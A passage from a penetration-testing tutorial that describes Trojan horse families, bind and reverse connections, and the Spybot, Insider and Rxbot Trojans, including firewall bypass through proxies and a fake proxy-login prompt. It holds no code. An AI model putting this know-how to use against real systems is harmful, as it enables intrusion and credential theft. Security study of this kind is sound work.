Trojan horses are rarely used in penetration tests. However they constitute a large portion of the post exploitation process . For more information about Trojan horses, please visit the wikipedia link.
Trojan horses are mainly categorized into three main families: Binary Trojans, Open Source Trojans and World Domination Trojans (bots). These Trojans can further be categorized as “bind connection” and “reverse connection”, depending on their connectivity architecture. As we've seen in Netcat, a “reverse connection” Trojan is able to traverse NAT and essentially connects from the victim to the attacker.
Binary Trojan Horses
These Trojans come in Binary form (exe) and usually include a “Trojan Configuration” graphical interface. They are built for disaster and often include features such as “Swap mount buttons”, “Eject CD Rom”, “Spy on Webcam” etc. Binary Trojans are considered extremely unsafe to use as they often contain backdoors themselves.
Open source Trojan horses
Open source Trojan horses are preferred as their source code can be reviewed for backdoor functions. There have been several situations where an open source Trojan contained a backdoor, so trusting open source Trojans blindly is not recommended. The additional benefit of open source Trojans is that they can be
modified and enhanced to suit our needs.
Spybot
Spybot is an IRC based Trojan. It acts as an IRC client which connects to an IRC server (either hosted by the attacker or by a 3rd party). The Trojan requires a password for operation and is able to listen to IRC chat commands as well as execute commands on the victim machine.
Insider
Insider is an HTTP based Trojan which is built for bypassing corporate firewalls and content inspection systems. The Trojan attempts to make an HTTP GET request to a predefined web server which contains a list of commands for execution. The Trojan looks for proxy server addresses in the registry and, if found, uses the proxy to connect to the web. If proxy authorization is required, the Trojan will pop up a proxy authentication dialog which will hopefully be filled by the unsuspecting user.
World domination Trojan horses
These Trojan horses can be considered as “hybrid worms,” as their main function is to spread and infect additional computers, usually by using common exploits. These Trojans usually scan the internet (or a predefined IP range) for vulnerable computers. When such a computer is found and exploited, the Trojan uploads a copy of itself to the victim machine, executes it and starts scanning again. When armed with fresh exploits, these Trojans can spread extremely fast.
These Trojans (bots) usually join together to form a “Bot-net” which can be used for DDOS attacks, spreading spam and other unpleasant features.
Rxbot
Rxbot is an IRC based Trojan with “spreading” capabilities. For fear of uncontrolled spreading, this Trojan will only be reviewed at the source code level. This trojan has some very interesting anti debugging code, including vmware checking etc. BE CAREFUL!